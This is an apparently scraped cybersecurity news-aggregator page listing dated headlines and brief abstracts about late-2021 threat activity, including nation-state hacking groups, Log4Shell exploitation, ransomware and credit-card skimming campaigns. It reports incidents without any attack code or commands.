Hackers used a cloud video hosting service to perform a supply chain attack on over one hundred real estate sites that injected malicious scripts to steal information inputted in website forms. (BleepingComputer)
January 4, 2022
North Korean Konni Hacker Group Targets Russian Diplomats Using New Year Greetings
Abstract
The attacks have been linked to a threat actor known as Konni, and have been taking place since at least December 20, cybersecurity firm Cluster25 said in a report published on Monday. (The Record)
December 30, 2021
Chinese Hacker Group Uses Log4j Exploit to Target Academic Institution
Abstract
A Chinese hacker group known for industrial espionage and intelligence collection used a vulnerability in Log4j to go after a large academic institution, researchers at CrowdStrike revealed Wednesday. (Cyberscoop)
December 29, 2021
Threat Actor Uses Novel HP iLO Rootkit to Wipe Servers
Abstract
An Iranian cybersecurity firm said it discovered a novel rootkit that hides inside the firmware of HP iLO devices and which has been used in real-world attacks to wipe servers of Iranian entities. (The Record)
December 28, 2021
Experts Detail Logging Tool of DanderSpritz Framework Used by Equation Group Hackers
Abstract
Cybersecurity researchers have offered a detailed glimpse into a system called DoubleFeature that's dedicated to logging the different stages of post-exploitation stemming from the deployment of DanderSpritz, a full-featured malware framework used by the Equation Group. DanderSpritz came to light on April 14, 2017, when a hacking group known as the Shadow Brokers leaked the exploit tool, among others, under a dispatch titled "Lost in Translation." Also included in the leaks was EternalBlue, a cyberattack exploit developed by the U.S. National Security Agency (NSA) that enabled threat actors to carry out the NotPetya ransomware attack on unpatched Windows computers. The tool is a modular, stealthy, and fully functional framework that relies on dozens of plugins for post-exploitation activities on Windows and Linux hosts. DoubleFeature is one among them, which functions as a "diagnostic tool for victim machines carrying DanderSpritz," researchers from... (The Hacker News)
December 28, 2021
New Flagpro malware linked to Chinese state-backed hackers
Abstract
The cyber-espionage APT (advanced persistent threat) group tracked as 'BlackTech' was spotted using a novel malware called 'Flagpro' in attacks against Japanese firms. (BleepingComputer)
December 28, 2021
Threat Actors Abuse MSBuild for Cobalt Strike Beacon Execution
Abstract
The malicious MSBuild project used by cybercriminals in recent attacks was designed to compile and execute specific C# code that in turn decodes and executes Cobalt Strike. (Security Week)
December 27, 2021
PECB Certified Lead Ethical Hacker: Take Your Career to the Next Level
Abstract
Cybercrime is increasing exponentially and presents devastating risks for most organizations. According to Cybercrime Magazine, global cybercrime damage is predicted to hit $10.5 trillion annually as of 2025. One of the more recent and increasingly popular ways of tackling such issues is ethical hacking, which identifies potential security vulnerabilities at an early stage. Certified ethical hackers use advanced tools and strategies to prevent cyberattacks and help organizations strengthen their cybersecurity. Why Companies Should Hire Ethical Hackers: As cyberattacks constantly evolve and improve, organizations must ensure that their defense systems and approach can keep up with the level and complexity of cyberattacks. In today's business era, organizations cannot afford to operate without identifying the vulnerabilities in their system and taking preventive measures. As such, ethical hackers provide several advantages: they offer a unique outsider's persp... (The Hacker News)
December 22, 2021
PYSA Emerges as Top Ransomware Actor in November
Abstract
Overtaking the Conti ransomware gang, PYSA finds success with government-sector attacks. (Threatpost)
December 22, 2021
Researchers Disclose Unpatched Vulnerabilities in Microsoft Teams Software
Abstract
Microsoft said it won't be fixing or is pushing patches to a later date for three of the four security flaws uncovered in its Teams business communication platform earlier this March. The disclosure comes from Berlin-based cybersecurity firm Positive Security, which found that the implementation of the link preview feature was susceptible to a number of issues that could "allow accessing internal Microsoft services, spoofing the link preview, and, for Android users, leaking their IP address, and DoS'ing their Teams app/channels." Of the four vulnerabilities, Microsoft is said to have addressed only one that results in IP address leakage from Android devices, with the tech giant noting that a fix for the denial-of-service (DoS) flaw will be considered in a future version of the product. The issues were responsibly disclosed to the company on March 10, 2021. Chief among the flaws is a server-side request forgery (SSRF) vulnerability in the endpoint "/urlp... (The Hacker News)
December 22, 2021
Evil Corp Wears REvil’s Garb to Hide Itself
Abstract
In a classic impersonation tactic, the Evil Corp group is now believed to be identifying itself as REvil to avoid sanctions imposed on it by the U.S. government. Even after several attempts of rebranding as a different malware, researchers were able to associate the malware easily with Evil Corp. ... (Cyware Alerts - Hacker News)
December 21, 2021
Tropic Trooper Cyber Espionage Hackers Targeting Transportation Sector
Abstract
Transportation industry and government agencies related to the sector are the victims of an ongoing campaign since July 2020 by a sophisticated and well-equipped cyberespionage group in what appears to be yet another uptick in malicious activities that are "just the tip of the iceberg." "The group tried to access some internal documents (such as flight schedules and documents for financial plans) and personal information on the compromised hosts (such as search histories)," Trend Micro researchers Nick Dai, Ted Lee, and Vickie Su said in a report published last week. Earth Centaur, also known by the monikers Pirate Panda and Tropic Trooper, is a long-running threat group focused on information theft and espionage that has led targeted campaigns against government, healthcare, transportation, and high-tech industries in Taiwan, the Philippines, and Hong Kong dating all the way back to 2011. The hostile agents, believed to be a Chinese-speaking actor, are kno... (The Hacker News)
December 21, 2021
Iranian Charming Kitten Enters Israeli Networks via Log4Shell
Abstract
Check Point researchers observed communications between a server used by the Charming Kitten group and targets in Israel. The group is actively taking advantage of a recently disclosed vulnerability in Log4j to carry out attacks. (Cyware Alerts - Hacker News)
December 20, 2021
Nation-state actors are exploiting Zoho zero-day CVE-2021-44515 since October, FBI warns
Abstract
The FBI warns that a zero-day flaw in Zoho's ManageEngine Desktop Central has been under active exploitation by nation-state actors since October. The Federal Bureau of Investigation (FBI) revealed that the critical CVE-2021-44515 zero-day vulnerability... (Security Affairs)
December 18, 2021
Trend Micro Spots Chinese Hackers Targeting Transportation Sector
Abstract
Since the middle of 2020, a Chinese state-sponsored threat actor called 'Tropic Trooper' has been targeting transportation organizations and government entities related to the transportation sector, Trend Micro reports. (Security Week)
December 17, 2021
New Report Sheds Light on Earth Centaur Activities
Abstract
Researchers uncovered details about the Earth Centaur group that has been targeting transportation firms and government agencies associated with transportation. The report suggests that the group attempts to access some internal documents and personal information that may be used in future attacks... (Cyware Alerts - Hacker News)
December 16, 2021
‘Tropic Trooper’ Reemerges to Target Transportation Outfits Full Text
Abstract
Analysts warn that the attack group, now known as ‘Earth Centaur,’ is honing its attacks to go after transportation and government agencies.Threatpost
December 16, 2021
Multiple Nation-State actors are exploiting Log4Shell flaw Full Text
Abstract
Nation-state actors from China, Iran, North Korea, and Turkey are attempting to exploit the Log4Shell vulnerability in attacks in the wild. Microsoft researchers reported that nation-state actors from China, Iran, North Korea, and Turkey are now abusing...Security Affairs
December 15, 2021
Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges Full Text
Abstract
Web infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a second bug disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware. The new vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0. "This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0," Cloudflare's Andre Bluehs and GabrielThe Hacker News
December 15, 2021
Seedworm Targeting Telecom, IT, and Utility firms in the Middle East and Asia Full Text
Abstract
Symantec revealed that the Iranian MuddyWater group has been targeting telecom operators, IT firms, and a utility company in the Middle East and other parts of Asia. Researchers observed that the attackers made a deliberate attempt to target more and more organizations by mounting a supply-chain at ...Cyware Alerts - Hacker News
December 15, 2021
China, Iran among those exploiting Apache cyber vulnerability, researchers say Full Text
Abstract
State-sponsored hackers from countries including Iran and China are actively exploiting a major vulnerability in Apache logging package log4j to target vulnerable organizations around the world, security researchers found this week.The Hill
December 15, 2021
Hackers Using Malicious IIS Server Module to Steal Microsoft Exchange Credentials Full Text
Abstract
Malicious actors are deploying a previously undiscovered binary, an Internet Information Services (IIS) webserver module dubbed "Owowa," on Microsoft Exchange Outlook Web Access servers with the goal of stealing credentials and enabling remote command execution. "Owowa is a C#-developed .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange's Outlook Web Access (OWA)," Kaspersky researchers Paul Rascagneres and Pierre Delcher said. "When loaded this way, Owowa will steal credentials that are entered by any user in the OWA login page, and will allow a remote operator to run commands on the underlying server." The idea that a rogue IIS module can be fashioned as a backdoor is not new. In August 2021, Slovak cybersecurity company ESET's study of the IIS landscape revealed as many as 14 malware families that were developed as native IIS modules in an attempt to intercept HTTP trafficThe Hacker News
December 15, 2021
State-sponsored hackers abuse Slack API to steal airline data Full Text
Abstract
A suspected Iranian state-supported threat actor is deploying a newly discovered backdoor named 'Aclip' that abuses the Slack API for covert communications.BleepingComputer
December 15, 2021
Log4j vulnerability now used by state-backed hackers, access brokers Full Text
Abstract
As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability (CVE-2021-44228) in the Log4j Java-based logging library.BleepingComputer
December 14, 2021
Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware Full Text
Abstract
Romanian cybersecurity technology company Bitdefender on Monday revealed that attempts are being made to target Windows machines with a novel ransomware family called Khonsari as well as a remote access Trojan named Orcus by exploiting the recently disclosed critical Log4j vulnerability. The attack leverages the remote code execution flaw to download an additional payload, a .NET binary, from a remote server that encrypts all the files with the extension ".khonsari" and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files. The vulnerability is tracked as CVE-2021-44228 and is also known by the monikers "Log4Shell" or "Logjam." In simple terms, the bug could force an affected system to download malicious software, giving the attackers a digital beachhead on servers located within corporate networks. Log4j is an open-source Java library maintained by the nonprofit Apache Software FThe Hacker News
December 14, 2021
‘Seedworm’ Attackers Target Telcos in Asia, Middle East Full Text
Abstract
The focused attacks aimed at cyberespionage and lateral movement appear to hint at further ambitions by the group, including supply-chain threats.Threatpost
December 14, 2021
Hackers steal Microsoft Exchange credentials using IIS module Full Text
Abstract
Threat actors are installing a malicious IIS web server module named 'Owowa' on Microsoft Exchange Outlook Web Access servers to steal credentials and execute commands on the server remotely.BleepingComputer
December 13, 2021
Karakurt: A New Emerging Data Theft and Cyber Extortion Hacking Group Full Text
Abstract
A previously undocumented, financially motivated threat group has been connected to a string of data theft and extortion attacks on over 40 entities between September and November 2021. The hacker collective, which goes by the self-proclaimed name Karakurt and was first identified in June 2021, is capable of modifying its tactics and techniques to adapt to the targeted environment, Accenture's Cyber Investigations, Forensics and Response (CIFR) team said in a report published on December 10. "The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big game hunting approach," the CIFR team said. "Based on intrusion analysis to date, the threat group focuses solely on data exfiltration and subsequent extortion, rather than the more destructive ransomware deployment." 95% of the known victims are based in North America, while the remaining 5% are inThe Hacker News
December 13, 2021
Hacker Poses As Support Rep to Breach Cox Communications Full Text
Abstract
The impacted data includes the Cox account number, access PIN, security questions and answers, list of active Cox services, Cox.net email address, name, address, and phone number of many customers.Forbes
December 12, 2021
Hackers start pushing malware in worldwide Log4Shell attacks Full Text
Abstract
Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers. In this article we compiled the known payloads, scans, and attacks using the Log4j vulnerability.BleepingComputer
December 10, 2021
New ‘Karakurt’ hacking group focuses on data theft and extortion Full Text
Abstract
A sophisticated cybercrime group known as 'Karakurt' who has been quietly working from the shadows has had its tactics and procedures exposed by researchers who tracked recent cyberattacks conducted by the hackers.BleepingComputer
December 9, 2021
Microsoft Seizes Malicious Domains Used by Nickel Full Text
Abstract
The Nickel group was using several malicious domains for intelligence gathering from multiple government agencies, think tanks, and human rights organizations worldwide.Cyware Alerts - Hacker News
December 9, 2021
Crooks inject e-skimmers in random WordPress plugins of e-stores Full Text
Abstract
Threat actors are injecting credit card swipers into random plugins of e-commerce WordPress sites, Sucuri researchers warn. Sucuri researchers are warning of threat actors injecting credit card swipers into random plugins of e-commerce WordPress sites....Security Affairs
December 9, 2021
KAX17 Runs Rogue Relays to Expose Tor Users Full Text
Abstract
Researchers stumbled across a mischievous threat actor, dubbed KAX17, running over 900 malicious servers allegedly to deanonymize Tor users. Most of the Tor relay servers used by the group were located in data centers worldwide and were configured as entry and middle points. The recent findings sho ...Cyware Alerts - Hacker News
December 08, 2021
Hackers infect random WordPress plugins to steal credit cards Full Text
Abstract
Credit card swipers are being injected into random plugins of e-commerce WordPress sites, hiding from detection while stealing customer payment details.BleepingComputer
December 08, 2021
XE Group exposed for eight years of hacking, credit card theft Full Text
Abstract
A relatively unknown group of Vietnamese hackers calling themselves 'XE Group' has been linked to eight years of for-profit hacking and credit card skimming.BleepingComputer
December 07, 2021
SolarWinds Hackers Targeting Government and Business Entities Worldwide Full Text
Abstract
Nobelium, the threat actor attributed to the massive SolarWinds supply chain compromise, has been once again linked to a series of attacks targeting multiple cloud solution providers, services, and reseller companies, as the hacking group continues to refine and retool its tactics at an alarming pace in response to public disclosures. The intrusions, which are being tracked by Mandiant under two different activity clusters UNC3004 and UNC2652, are both associated with UNC2452, an uncategorized threat group that has since been tied to the Russian intelligence service. UNC2652, in particular, has been observed targeting diplomatic entities with phishing emails containing HTML attachments with malicious JavaScript, ultimately dropping a Cobalt Strike Beacon onto the infected devices. "In most instances, post compromise activity included theft of data relevant to Russian interests," Mandiant researchers Luke Jenkins, Sarah Hawley, Parnian Najafi, and Doug Bienstock said inThe Hacker News
December 07, 2021
Microsoft Seizes 42 Malicious Web Domains Used By Chinese Hackers Full Text
Abstract
Microsoft on Monday announced the seizure of 42 domains used by a China-based cyber espionage group that set its sights on organizations in the U.S. and 28 other countries pursuant to a legal warrant issued by a federal court in the U.S. state of Virginia. The Redmond company attributed the malicious activities to a group it pursues as Nickel, and by the wider cybersecurity industry under the monikers APT15, Bronze Palace, Ke3Chang, Mirage, Playful Dragon, and Vixen Panda. The advanced persistent threat (APT) actor is believed to have been active since at least 2012. "Nickel has targeted organizations in both the private and public sectors, including diplomatic organizations and ministries of foreign affairs in North America, Central America, South America, the Caribbean, Europe and Africa," Microsoft's Corporate Vice President for Customer Security and Trust, Tom Burt, said. "There is often a correlation between Nickel's targets and China's geopolitical intThe Hacker News
December 06, 2021
Russian group behind SolarWinds incident ramping up hacking efforts, analysis says Full Text
Abstract
The Russian government-linked hacking group behind one of the biggest cyber espionage incidents in U.S. history has only intensified its hacking efforts in the year since, research released Monday found.The Hill
December 06, 2021
Microsoft disrupts Chinese hacking group targeting organizations in dozens of countries Full Text
Abstract
Microsoft on Monday announced that a federal court had granted a request to allow the company to seize websites being used by a Chinese based hacking group that were targeting organizations in the United States and 28 other nations.The Hill
December 6, 2021
Threat actors stole more than $150 million worth of cryptocurrency tokens from BitMart platform Full Text
Abstract
Threat actors stole more than $150 million in various cryptocurrencies from the cryptocurrency trading platform BitMart. Cryptocurrency trading platform BitMart has disclosed a security breach; threat actors stole more than $150 million in various cryptocurrencies....Security Affairs
December 06, 2021
Russian hacking group uses new stealthy Ceeloader malware Full Text
Abstract
The Nobelium hacking group continues to breach government and enterprise networks worldwide by targeting their cloud and managed service providers and using a new custom "Ceeloader" malware.BleepingComputer
December 6, 2021
Hackers are sending receipts with anti-work messages to businesses’ printers Full Text
Abstract
Hackers are targeting printers of businesses around the world to print ‘anti-work’ slogans pushing workers to demand better pay. Multiple employees are sharing on Twitter and Reddit the images of anti-work messages sent to the printers of their...Security Affairs
December 4, 2021
Hackers steal $120m from Badger Defi and $30m from MonoX Full Text
Abstract
Two DeFi projects BadgerDAO and MonoX are the latest victims of security breaches in which hundreds of millions of dollars worth of cryptocurrency has been stolen by hackers.Hackread
December 03, 2021
Researchers Detail How Pakistani Hackers Are Targeting Indian and Afghan Governments Full Text
Abstract
A Pakistani threat actor successfully socially engineered a number of ministries in Afghanistan and a shared government computer in India to steal sensitive Google, Twitter, and Facebook credentials from its targets and stealthily obtain access to government portals. Malwarebytes' latest findings go into detail about the new tactics and tools adopted by the APT group known as SideCopy, which is so-called because of its attempts to mimic the infection chains associated with another group tracked as SideWinder and mislead attribution. "The lures used by SideCopy APT are usually archive files that have embedded one of these files: LNK, Microsoft Publisher or Trojanized Applications," Malwarebytes researcher Hossein Jazi said, adding the embedded files are tailored to target government and military officials based in Afghanistan and India. The revelation comes close on the heels of disclosures that Meta took steps to block malicious activities carried out by theThe Hacker News
December 3, 2021
KAX17 threat actor is attempting to deanonymize Tor users running thousands of rogue relays Full Text
Abstract
Since 2017, an unknown threat actor has run thousands of malicious Tor relay servers in the attempt to unmask Tor users. A mysterious threat actor, tracked as KAX17, has run thousands of malicious Tor relay servers since 2017 in an attempt to deanonymize...Security Affairs
December 02, 2021
Hackers use in-house Zoho ServiceDesk exploit to drop webshells Full Text
Abstract
An advanced persistent threat (APT) group that had been exploiting a flaw in the Zoho ManageEngine ADSelfService Plus software has pivoted to leveraging a different vulnerability in another Zoho product.BleepingComputer
December 01, 2021
Hackers Increasingly Using RTF Template Injection Technique in Phishing Attacks Full Text
Abstract
Three different state-sponsored threat actors aligned with China, India, and Russia have been observed adopting a new method called RTF (aka Rich Text Format) template injection as part of their phishing campaigns to deliver malware to targeted systems. "RTF template injection is a novel technique that is ideal for malicious phishing attachments because it is simple and allows threat actors to retrieve malicious content from a remote URL using an RTF file," Proofpoint researchers said in a new report shared with The Hacker News. At the heart of the attack is an RTF file containing decoy content that can be manipulated to enable the retrieval of content, including malicious payloads, hosted at an external URL upon opening an RTF file. Specifically, it leverages the RTF template functionality to alter a document's formatting properties using a hex editor by specifying a URL resource instead of an accessible file resource destination from which a remote payloadThe Hacker News
December 01, 2021
Hackers targeting and stealing billions from Iranian citizens in texting scheme Full Text
Abstract
Financially motivated hackers likely based in Iran are successfully targeting and stealing billions in currency from Iranian civilians through a texting campaign, new research released Wednesday found.The Hill
November 30, 2021
WIRTE Hacker Group Targets Government, Law, Financial Entities in Middle East Full Text
Abstract
Government, diplomatic entities, military organizations, law firms, and financial institutions primarily located in the Middle East have been targeted as part of a stealthy malware campaign as early as 2019 by making use of malicious Microsoft Excel and Word documents. Russian cybersecurity company Kaspersky attributed the attacks with high confidence to a threat actor named WIRTE, adding the intrusions involved "MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant," which is a Visual Basic Script (VBS) with functionality to amass system information and execute arbitrary code sent by the attackers on the infected machine. An analysis of the campaign as well as the toolset and methods employed by the adversary has also led the researchers to conclude with low confidence that the WIRTE group has connections to another politically motivated collective called the Gaza Cybergang. The affected entities are spread across Armenia, CypThe Hacker News
November 30, 2021
Cyberattackers Slowing Down the Pace of Financial Services Sector Full Text
Abstract
Cyberattackers are launching a number of attacks aimed at the financial sector with the most targeted regions being North and South America, Western Europe, and Southern Asia. One of the most common and frequent attack vectors was phishing, followed by social engineering. Such cyberattacks on the f ...Cyware Alerts - Hacker News
November 29, 2021
Stealthy WIRTE hackers target governments in the Middle East Full Text
Abstract
A stealthy hacking group named WIRTE has been linked to a government-targeting campaign conducting attacks since at least 2019 using malicious Excel 4.0 macros.BleepingComputer
November 29, 2021
Hackers Using Compromised Google Cloud Accounts to Mine Cryptocurrency Full Text
Abstract
Threat actors are exploiting improperly-secured Google Cloud Platform (GCP) instances to download cryptocurrency mining software to the compromised systems as well as abusing its infrastructure to install ransomware, stage phishing campaigns, and even generate traffic to YouTube videos for view count manipulation. "While cloud customers continue to face a variety of threats across applications and infrastructure, many successful attacks are due to poor hygiene and a lack of basic control implementation," Google's Cybersecurity Action Team (CAT) outlined as part of its recent Threat Horizons report published last week. Of the 50 recently compromised GCP instances, 86% of them were used to conduct cryptocurrency mining, in some cases within 22 seconds of successful breach, while 10% of the instances were exploited to perform scans of other publicly accessible hosts on the Internet to identify vulnerable systems, and 8% of the instances were used to strike other entitiThe Hacker News
November 28, 2021
North Korea-linked Zinc group posed as Samsung recruiters to target security firms Full Text
Abstract
North Korea-linked threat actors posed as Samsung recruiters in a spear-phishing campaign aimed at employees at South Korean security firms. North Korea-linked APT group posed as Samsung recruiters in a spear-phishing campaign that targeted South...Security Affairs
November 27, 2021
Iranian Hackers Abusing Known Bug in Microsoft’s MSHTML Full Text
Abstract
A new Iranian actor was spotted abusing an RCE flaw in Microsoft MSHTML to target Farsi-speaking people globally and steal their Google and Instagram credentials. The attacks started in July via spear-phishing emails that targeted Windows users with Winword attachments. Experts recommend organiz ...Cyware Alerts - Hacker News
November 26, 2021
Hackers Targeting Biomanufacturing Facilities With Tardigrade Malware Full Text
Abstract
An advanced persistent threat (APT) has been linked to cyberattacks on two biomanufacturing companies that occurred this year with the help of a custom malware loader called "Tardigrade." That's according to an advisory published by Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) this week, which noted that the malware is actively spreading across the sector with the likely goal of perpetrating intellectual property theft, maintaining persistence for extended periods of time, and infecting the systems with ransomware. BIO-ISAC, which commenced an investigation following a ransomware attack targeting an unnamed biomanufacturing facility earlier this spring, characterized Tardigrade as a sophisticated piece of malware with "a high degree of autonomy as well as metamorphic capabilities." The same malware was then used to strike a second entity in October 2021. The "actively spreading" intrusions have not been attributed to a specificThe Hacker News
November 26, 2021
Crypto Hackers Using Babadeda Crypter to Make Their Malware Undetectable Full Text
Abstract
A new malware campaign has been discovered targeting cryptocurrency, non-fungible token (NFT), and DeFi aficionados through Discord channels to deploy a crypter named "Babadeda" that's capable of bypassing antivirus solutions and stage a variety of attacks. "[T]his malware installer has been used in a variety of recent campaigns to deliver information stealers, RATs, and even LockBit ransomware," Morphisec researchers said in a report published this week. The malware distribution attacks are said to have commenced in May 2021. Crypters are a type of software used by cybercriminals that can encrypt, obfuscate, and manipulate malicious code so as to appear seemingly innocuous and make it harder to detect by security programs — a holy grail for malware authors. The infiltrations observed by Morphisec involved the threat actor sending decoy messages to prospective users on Discord channels related to blockchain-based games such as Mines of Dalarnia, urgThe Hacker News
November 25, 2021
Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware Full Text
Abstract
A new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims with a new PowerShell-based information stealer designed to harvest extensive details from infected machines. "[T]he stealer is a PowerShell script, short with powerful collection capabilities — in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment," SafeBreach Labs researcher Tomer Bar said in a report published Wednesday. Nearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at "Iranians who live abroad and might be seen as a threat to Iran's Islamic regime." The phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be expThe Hacker News
November 25, 2021
Iranian threat actors exploit MS MSHTML bug to steal Google and Instagram credentials Full Text
Abstract
An Iranian threat actor is stealing Google and Instagram credentials of Farsi-speaking targets by exploiting a Microsoft MSHTML bug. Researchers from SafeBreach Labs spotted a new Iranian threat actor that is using an exploit for a Microsoft MSHTML...Security Affairs
November 25, 2021
Warning — Hackers Exploiting New Windows Installer Zero-Day Exploit in the Wild Full Text
Abstract
Attackers are actively making efforts to exploit a new variant of a recently disclosed privilege escalation vulnerability to potentially execute arbitrary code on fully-patched systems, once again demonstrating how adversaries move quickly to weaponize a publicly available exploit. Cisco Talos disclosed that it "detected malware samples in the wild that are attempting to take advantage of this vulnerability." Tracked as CVE-2021-41379 and discovered by security researcher Abdelhamid Naceri, the elevation of privilege flaw affecting the Windows Installer software component was originally resolved as part of Microsoft's Patch Tuesday updates for November 2021. However, in what's a case of an insufficient patch, Naceri found that it was not only possible to bypass the fix implemented by Microsoft but also achieve local privilege escalation via a newly discovered zero-day bug. The proof-of-concept (PoC) exploit, dubbed "InstallerFileTakeOver," wThe Hacker News
November 24, 2021
The Record by Recorded Future Full Text
Abstract
An Iranian threat actor discovered earlier this year is responsible for raids against U.S. targets designed to hoover up Gmail and Instagram credentials, according to research by SafeBreach.The Record
November 23, 2021
Threat actors find and compromise exposed services in 24 hours Full Text
Abstract
Researchers set up 320 honeypots to see how quickly threat actors would target exposed cloud services and report that 80% of them were compromised in under 24 hours.BleepingComputer
November 23, 2021
Hackers target biomanufacturing with stealthy Tardigrade malware Full Text
Abstract
An advanced hacking group is actively targeting biomanufacturing facilities with a new custom malware called 'Tardigrade.'BleepingComputer
November 22, 2021
Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns Full Text
Abstract
Threat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched Microsoft Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems. The findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a never-before-seen loader dubbed SQUIRRELWAFFLE. First publicly documented by Cisco Talos, the attacks are believed to have commenced in mid-September 2021 via laced Microsoft Office documents. "It is known for sending its malicious emails as replies to pre-existing email chains, a tactic that lowers a victim's guard against malicious activities," researchers Mohamed Fahmy, Sherif Magdy, and Abdelrhman Sharshar said in a report published last week. "To be able to pull this off, we believe it involved the use of a chain of both ProxyLogon and ProxyShell exploits." ProxyLoThe Hacker News
November 22, 2021
Ethical hackers and the economics of security research Full Text
Abstract
New findings from a Bugcrowd report indicate a startling shift in the threat landscape with 8 out of 10 ethical hackers recently having identified a vulnerability they had never seen before.Help Net Security
November 20, 2021
RedCurl Corporate Espionage Hackers Return With Updated Hacking Tools Full Text
Abstract
A corporate cyber-espionage hacker group has resurfaced after a seven-month hiatus with new intrusions targeting four companies this year, including one of the largest wholesale stores in Russia, while simultaneously making tactical improvements to its toolset in an attempt to thwart analysis. "In every attack, the threat actor demonstrates extensive red teaming skills and the ability to bypass traditional antivirus detection using their own custom malware," Group-IB's Ivan Pisarev said. Active since at least November 2018, the Russian-speaking RedCurl hacking group has been linked to 30 attacks to date with the goal of corporate cyber espionage and document theft aimed at 14 organizations spanning construction, finance, consulting, retail, insurance, and legal sectors and located in the U.K., Germany, Canada, Norway, Russia, and Ukraine. The threat actor uses an array of established hacking tools to infiltrate its targets and steal internal corporate documentatThe Hacker News
November 20, 2021
North Korean Hackers Found Behind a Range of Credential Theft Campaigns Full Text
Abstract
A threat actor with ties to North Korea has been linked to a prolific wave of credential theft campaigns targeting research, education, government, media and other organizations, with two of the attacks also attempting to distribute malware that could be used for intelligence gathering. Enterprise security firm Proofpoint attributed the infiltrations to a group it tracks as TA406, and by the wider threat intelligence community under the monikers Kimsuky (Kaspersky), Velvet Chollima (CrowdStrike), Thallium (Microsoft), Black Banshee (PwC), ITG16 (IBM), and the Konni Group (Cisco Talos). Policy experts, journalists and nongovernmental organizations (NGOs) were targeted as part of weekly campaigns observed from January through June 2021, Proofpoint researchers Darien Huss and Selena Larson disclosed in a technical report detailing the actor's tactics, techniques, and procedures (TTPs), with the attacks spread across North America, Russia, China, and SouthThe Hacker News
November 20, 2021
Microsoft Reports Evolution of Iranian Hacking Groups Full Text
Abstract
From September 2020, the tech giant has been tracking six Iranian hacking groups (DEV-0146, DEV-0227, DEV-0198, DEV-0500, Rubidium, and Phosphorus) spreading ransomware and stealing data.Cyware Alerts - Hacker News
November 20, 2021
The Glitch Platform Is Being Used By Hackers to Host Malicious URLs Full Text
Abstract
The Glitch platform has become a target for phishing hackers. It seems that the service is being actively abused by cybercriminals with the goal of hosting, for free, phishing sites that perform credential theft.Heimdal Security
November 20, 2021
North Korean Hacker Group Intensifies Espionage Campaigns Full Text
Abstract
The adversary, which security researchers also refer to as Kimsuky, Thallium, and Konni, has been targeting organizations in sectors such as education, government, media, and research, as well as other industries.Security Week
November 19, 2021
North Korea-linked TA406 cyberespionage group activity in 2021 Full Text
Abstract
North Korea-linked TA406 APT group has intensified its attacks in 2021, particularly credential harvesting campaigns. A report published by Proofpoint revealed that the North Korea-linked TA406 APT group (Kimsuky, Thallium, and Konni, Black Banshee, Velvet...Security Affairs
November 18, 2021
Hundreds participate in electric grid cyberattack simulation amid increasing threats Full Text
Abstract
More than 700 individuals associated with the bulk power grid and other related critical infrastructure participated in a simulation this week designed to test resilience against a major physical and cyberattack.The Hill
November 18, 2021
Microsoft: Iranian state hackers increasingly target IT sector Full Text
Abstract
Microsoft says Iranian-backed hacking groups have increasingly attempted to compromise IT services companies this year to steal credentials they could use to breach the systems of downstream clients.BleepingComputer
November 18, 2021
North Korean Threat Group Targets Foreign Policy Experts, Journalists, and NGOs
Abstract
From January through June 2021, Proofpoint observed almost weekly campaigns by TA406 targeting foreign policy experts, journalists, and nongovernmental organizations (NGOs). (Proofpoint)
November 18, 2021
RedCurl corporate espionage hackers resume attacks with updated tools
Abstract
A crew of highly skilled hackers specialized in corporate espionage has resumed activity, one of their victims this year being a large wholesale company in Russia. (BleepingComputer)
November 17, 2021
Microsoft Warns about 6 Iranian Hacking Groups Turning to Ransomware
Abstract
Nation-state operators with nexus to Iran are increasingly turning to ransomware as a means of generating revenue and intentionally sabotaging their targets, while also engaging in patient and persistent social engineering campaigns and aggressive brute force attacks. No less than six threat actors affiliated with the West Asian country have been discovered deploying ransomware to achieve their strategic objectives, researchers from Microsoft Threat Intelligence Center (MSTIC) revealed, adding "these ransomware deployments were launched in waves every six to eight weeks on average." Of note is a threat actor tracked as Phosphorus (aka Charming Kitten or APT35), which has been found scanning IP addresses on the internet for unpatched Fortinet FortiOS SSL VPN and on-premises Exchange Servers to gain initial access and persistence on vulnerable networks, before moving to deploy additional payloads that enable the actors to pivot to other machines and deploy ransomware. (The Hacker News)
November 17, 2021
U.S., U.K. and Australia Warn of Iranian Hackers Exploiting Microsoft, Fortinet Flaws
Abstract
